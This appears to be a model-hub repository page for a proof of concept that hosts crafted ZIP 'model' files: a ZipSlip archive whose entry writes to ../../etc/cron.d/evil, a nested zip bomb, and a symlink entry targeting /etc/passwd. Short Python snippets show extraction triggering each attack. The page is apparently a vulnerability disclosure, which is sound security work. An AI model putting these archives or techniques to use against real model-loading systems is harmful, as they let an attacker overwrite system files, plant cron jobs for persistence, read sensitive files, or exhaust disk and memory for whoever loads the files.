WolfpackArmy
/

zip-zipslip-dos-poc

Model card Files Files and versions

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

ZIP Model File Vulnerability PoC

Vulnerability

Path Traversal (ZipSlip), Zip Bomb DoS, and Symlink Attack via crafted ZIP model files

Files

poc_zipslip.zip — Path traversal entries (../../etc/cron.d/evil), writes outside extraction dir
poc_zipbomb.zip — 100KB compressed, expands to 100MB (10x nested layers of zeros)
poc_symlink.zip — Symlink entry pointing to /etc/passwd
benign.zip — Clean ZIP for comparison

Reproduce

import zipfile, os
# ZipSlip - extracts files outside target directory:
with zipfile.ZipFile('poc_zipslip.zip', 'r') as zf:
    zf.extractall('/tmp/model/')  # Writes to ../../etc/cron.d/evil

# Zip Bomb - causes excessive disk/memory usage:
with zipfile.ZipFile('poc_zipbomb.zip', 'r') as zf:
    for name in zf.namelist():
        data = zf.read(name)  # 100MB total expansion

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support